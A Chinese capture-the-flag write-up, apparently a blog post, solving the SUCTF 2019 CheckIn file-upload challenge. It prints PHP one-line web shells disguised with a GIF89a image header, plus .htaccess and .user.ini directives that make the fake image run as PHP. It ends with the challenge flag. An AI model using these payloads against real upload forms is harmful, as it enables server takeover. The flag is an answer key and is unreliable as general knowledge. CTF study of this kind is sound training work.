BUUCTF Web [SUCTF 2019]CheckIn1

[SUCTF 2019]CheckIn1

启动靶机,直接尝试传木马

启用burp抓包,尝试改后缀jpg和content-type 

 提示我们上传的文件中含有非法字符<?

尝试一句话木马变形

<script language="php">@eval_r($_GET[b])</script>

看来还对文件头进行了检测 ,上传图片马

GIF89a?
<script language="pHp">eval($_REQUEST[1])</script>

上传成功 

此时访问上传jpg文件是无法解析我们的php代码的,需要再上传个.htaccess文件(前面也要加上文件头)

GIF89a?
AddType application/x-httpd-php .jpg

 

点击上传

 上传成功,访问一下.htaccess,神奇的是直接下载了一个index.htaccess文件,感觉是没戏了,抱着试一试的态度访问了一下图片马,果然,还是jpg无法解析。

既然不能通过.htaccess的方法解析图片马,那就搜一下大佬的wp,发现他们都用了.user.ini方法

GIF89a?
auto_prepend_file=tupianma.jpg

 

 

 上传成功,但图片马好像没了,还需要再传一次,上传成功,先访问一下index.php,蚁剑连接

 拿到flag            flag{0e59e145-2ce6-4d5f-939e-2aee06bbca57}

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

WmVicmE=

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值